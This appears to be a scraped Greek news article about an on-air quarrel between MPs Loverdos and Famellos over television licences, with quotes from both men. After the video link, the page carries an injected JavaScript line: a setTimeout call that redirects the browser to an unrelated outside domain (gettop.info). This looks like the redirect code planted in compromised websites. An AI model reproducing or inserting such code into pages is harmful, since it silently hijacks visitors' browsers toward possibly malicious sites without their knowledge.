Κόντρα Φάμελλου-Λοβέρδου για τις άδειες (BINTEO)

0
5

 

Κόντρα ξέσπασε στον αέρα της εκπομπής «Καλημέρα Ελλάδα» του Γιώργου Παπαδάκη, ανάμεσα στον κοινοβουλευτικό εκπρόσωπο της Δημοκρατικής Συμπαράταξης, Ανδρέα Λοβέρδο και τον κοινοβουλευτικό εκπρόσωπο του ΣΥΡΙΖΑ Σωκράτη Φάμελλο, με αφορμή τις τηλεοπτικές άδειες.

Ο κ.Λοβέρδος ανέφερε ότι το θέμα με τα «βοσκοτόπια», όπως τόνισε χαρακτηριστικά, το έβαλε ο κ. Καμμένος.

«Το έβαλε μέσα στην κυβέρνηση το έτερο κόμμα. Εδώ δεν συνεννοείστε μεταξύ σας για την αλήθεια επί θεμάτων εντιμότητας, έρχεστε να τα πείτε τώρα σε εμάς», δήλωσε ο κοινοβουλευτικός εκπρόσωπος της Δημοκρατικής Συμπαράταξης. «Εδώ σας είπε γίδα resort», σχολίασε ο κ. Λοβέρδος.

Άμεση ήταν η αντίδραση του κ.Φάμελλου, σύμφωνα με το antenna.gr, ο οποίος είπε: «Είναι αστείο με υποθέσεις να κάνουμε πολιτική, όπως επίσης δεν δέχομαι πολιτική σε αυτό το επίπεδο που συζητάμε σοβαρά να χρησιμοποιούν κοινές εκφράσεις όπως “σανό”. Αυτό απεικονίζει ακριβώς τη δική σας άποψη για την πολιτική».

«Γιατί δεν κάνετε ένσταση επί του διαγωνισμού», είπε προς τον κ. Λοβέρδο ο κ. Φάμελλος και συνέχισε: «Γιατί δεν κάνατε τόσα χρόνια διαγωνισμό κ. Λοβέρδο; Γιατί δεν είχατε τα κότσια τα πολιτικά να κάνετε διαγωνισμό; Τώρα που κάναμε διαγωνισμό το ένα σας μυρίζει, το άλλο σας βρωμάει».

«Όχι, δεν περνάνε τα ψέματα πια. Τέρμα το σανό», ανταπάντησε ο κ. Λοβέρδος.

«Ωραίο επίπεδο. Σας αφήνω στους τηλεθεατές. Κάνετε σόου στην τηλεόραση», σχολίασε ο κ. Φάμελλος.

http://www.dailymotion.com/video/x4tr2rk_%CE%B1%CE%BD%CF%84%CE%B9%CF%80%CE%B1%CF%81%CE%AC%CE%B8%CE%B5%CF%83%CE%B7-%CF%86%CE%AC%CE%BC%CE%B5%CE%BB%CE%BB%CE%BF%CF%85-%CE%BB%CE%BF%CE%B2%CE%AD%CF%81%CE%B4%CE%BF%CF%85-%CE%B3%CE%B9%CE%B1-%CF%84%CE%B9%CF%82-%CF%84%CE%B7%CE%BB%CE%B5%CE%BF%CF%80%CF%84%CE%B9%CE%BA%CE%AD%CF%82-%CE%AC%CE%B4%CE%B5%CE%B9%CE%B5%CF%82-%CE%B2in%CF%84%CE%B5o_news setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here